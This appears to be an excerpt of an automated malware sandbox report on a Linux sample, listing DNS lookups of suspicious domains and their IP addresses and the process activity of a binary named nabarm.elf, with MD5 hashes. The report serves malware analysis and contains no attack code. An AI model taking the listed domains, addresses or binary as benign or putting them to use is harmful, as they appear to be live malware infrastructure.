            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.248A (IP address)IN (0x0001)false
            Nov 28, 2024 09:08:50.695333004 CET168.235.111.72192.168.2.130xd22fNo error (0)burnthe.libre154.213.187.247A (IP address)IN (0x0001)false
            Nov 28, 2024 09:09:14.978992939 CET51.158.108.203192.168.2.130x31aFormat error (1)netfags.geek. [malformed]nonenone256298false

            System Behavior

            Start time (UTC):08:07:41
            Start date (UTC):28/11/2024
            Path:/usr/bin/dash
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):08:07:41
            Start date (UTC):28/11/2024
            Path:/usr/bin/rm
            Arguments:rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0
            File size:72056 bytes
            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

            Start time (UTC):08:07:41
            Start date (UTC):28/11/2024
            Path:/usr/bin/dash
            Arguments:-
            File size:129816 bytes
            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

            Start time (UTC):08:07:41
            Start date (UTC):28/11/2024
            Path:/usr/bin/rm
            Arguments:rm -f /tmp/tmp.OvAK5hv7uI /tmp/tmp.Uai4AwLtRP /tmp/tmp.5Dhxs8F4q0
            File size:72056 bytes
            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

            Start time (UTC):08:07:46
            Start date (UTC):28/11/2024
            Path:/tmp/nabarm.elf
            Arguments:/tmp/nabarm.elf
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):08:07:46
            Start date (UTC):28/11/2024
            Path:/tmp/nabarm.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):08:07:46
            Start date (UTC):28/11/2024
            Path:/tmp/nabarm.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):08:07:47
            Start date (UTC):28/11/2024
            Path:/tmp/nabarm.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

            Start time (UTC):08:07:47
            Start date (UTC):28/11/2024
            Path:/tmp/nabarm.elf
            Arguments:-
            File size:4956856 bytes
            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1